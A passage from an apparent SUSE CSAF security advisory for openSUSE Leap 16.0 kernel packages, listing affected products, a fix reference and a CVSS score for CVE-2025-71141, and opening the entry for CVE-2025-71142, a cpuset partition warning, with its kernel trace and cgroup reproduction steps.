"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71141",
"url": "https://www.suse.com/security/cve/CVE-2025-71141"
},
{
"category": "external",
"summary": "SUSE Bug 1256756 for CVE-2025-71141",
"url": "https://bugzilla.suse.com/1256756"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71141"
},
{
"cve": "CVE-2025-71142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpuset: fix warning when disabling remote partition\n\nA warning was triggered as follows:\n\nWARNING: kernel/cgroup/cpuset.c:1651 at remote_partition_disable+0xf7/0x110\nRIP: 0010:remote_partition_disable+0xf7/0x110\nRSP: 0018:ffffc90001947d88 EFLAGS: 00000206\nRAX: 0000000000007fff RBX: ffff888103b6e000 RCX: 0000000000006f40\nRDX: 0000000000006f00 RSI: ffffc90001947da8 RDI: ffff888103b6e000\nRBP: ffff888103b6e000 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000001 R11: ffff88810b2e2728 R12: ffffc90001947da8\nR13: 0000000000000000 R14: ffffc90001947da8 R15: ffff8881081f1c00\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f55c8bbe0b2 CR3: 000000010b14c000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n update_prstate+0x2d3/0x580\n cpuset_partition_write+0x94/0xf0\n kernfs_fop_write_iter+0x147/0x200\n vfs_write+0x35d/0x500\n ksys_write+0x66/0xe0\n do_syscall_64+0x6b/0x390\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f55c8cd4887\n\nReproduction steps (on a 16-CPU machine):\n\n # cd /sys/fs/cgroup/\n # mkdir A1\n # echo +cpuset \u003e A1/cgroup.subtree_control\n # echo \"0-14\" \u003e A1/cpuset.cpus.exclusive\n # mkdir A1/A2\n # echo \"0-14\" \u003e A1/A2/cpuset.cpus.exclusive\n # echo \"root\" \u003e A1/A2/cpuset.cpus.partition\n # echo 0 \u003e /sys/devices/system/cpu/cpu15/online\n # echo member \u003e A1/A2/cpuset.cpus.partition\n\nWhen CPU 15 is offlined, subpartitions_cpus gets cleared because no CPUs\nremain available for the top_cpuset, forcing partitions to share CPUs with\nthe top_cpuset. In this scenario, disabling the remote partition triggers\na warning stating that effective_xcpus is not a subset of\nsubpartitions_cpus. Partitions should be invalidated in this case to\ninform users that the partition is now 